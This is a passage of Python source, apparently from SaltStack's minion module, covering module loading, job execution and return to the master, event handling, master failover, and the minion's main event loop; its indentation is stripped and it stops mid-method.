def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
def timeout_handler(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
# Don't duplicate jobs
log.trace('Started JIDs: {0}'.format(self.jid_queue))
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if function_name != 'saltutil.refresh_pillar' and \
function_name not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error('Returner {0} could not be loaded: {1}'.format(
returner_str, returner_err))
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
# this minion is blacked out. Only allow saltutil.refresh_pillar
if data['fun'][ind] != 'saltutil.refresh_pillar' and \
data['fun'][ind] not in minion_instance.opts['pillar'].get('minion_blackout_whitelist', []):
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if multifunc_ordered:
ret['return'][ind] = func(*args, **kwargs)
ret['retcode'][ind] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][ind] = True
else:
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning('Cannot run startup_states when \'master_type\' is '
'set to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.')
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Minion of "{0}" is handling event tag \'{1}\''.format(self.opts['master'], tag))
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug('Connected to master {0}'.format(data['schedule'].split(master_event(type='alive', master=''))[1]))
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug('Updating auth data for {0}: {1} -> {2}'.format(
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']))
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons()
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler()
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
